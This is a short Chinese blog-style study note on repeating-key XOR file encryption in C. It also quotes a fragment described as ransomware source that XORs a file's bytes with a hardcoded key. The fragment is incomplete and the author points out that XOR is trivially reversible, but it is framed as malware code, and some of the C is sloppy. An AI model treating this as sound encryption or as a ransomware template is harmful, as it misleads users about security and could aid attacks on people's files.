C语言学习记录——对文件异或加密

最为简单的加密方式,这里基本思想是把一串数据和密码扔进去,使用密码对数据依次异或。

考虑到密码一般都比数据短,这里将密码反复使用。

void En_decryptFile(char* pstr, char* psw, int len) {
	int i, j;
	i = j = 0;



	while (i < len)
	{
		if (psw[j] == NULL)
		{
			j = 0;
		}
		pstr[i] = pstr[i] ^ psw[j];
		i++;
		j++;
	}
}

这里收集一个C勒索程序源码片段,同样使用异或加密,但可以想见的,真实的勒索程序并不会使用异或作为加密手段,因为密钥会存在数据中,可以被找到,由于异或的特点,再次异或之后便可以恢复。

	
const char *Key="23333333333333";



               //分别进行读取(源文件)和写出(被加密文件)的操作
	FILE *f1=fopen(File_0,"r+b"); 
	FILE *f2=fopen(File_E,"w+b") ;

	//获取文件大小
	unsigned long StrLong=GetFileSizeK(File_0);
                //创建一个用于保存加密后数据的内容
	char *pDATA = (char *)malloc(StrLong*sizeof(char));

	//把文件读入pDATA
	fread(pDATA, sizeof(char), StrLong, f1);
for (unsigned long i = 0; i < StrLong; i++) {
	    //将pDATA内的数据逐一加密
		pDATA[i]^=(GetRanDomKey());


char GetRanDomKey() {
	static unsigned short con; //????????????
	++con;
	if(con==(strlen(Key)+1)) {
		con=0;
	}

	return	Key[con];
}

 

你可能感兴趣的:(学习记录,c语言,加密解密,信息安全)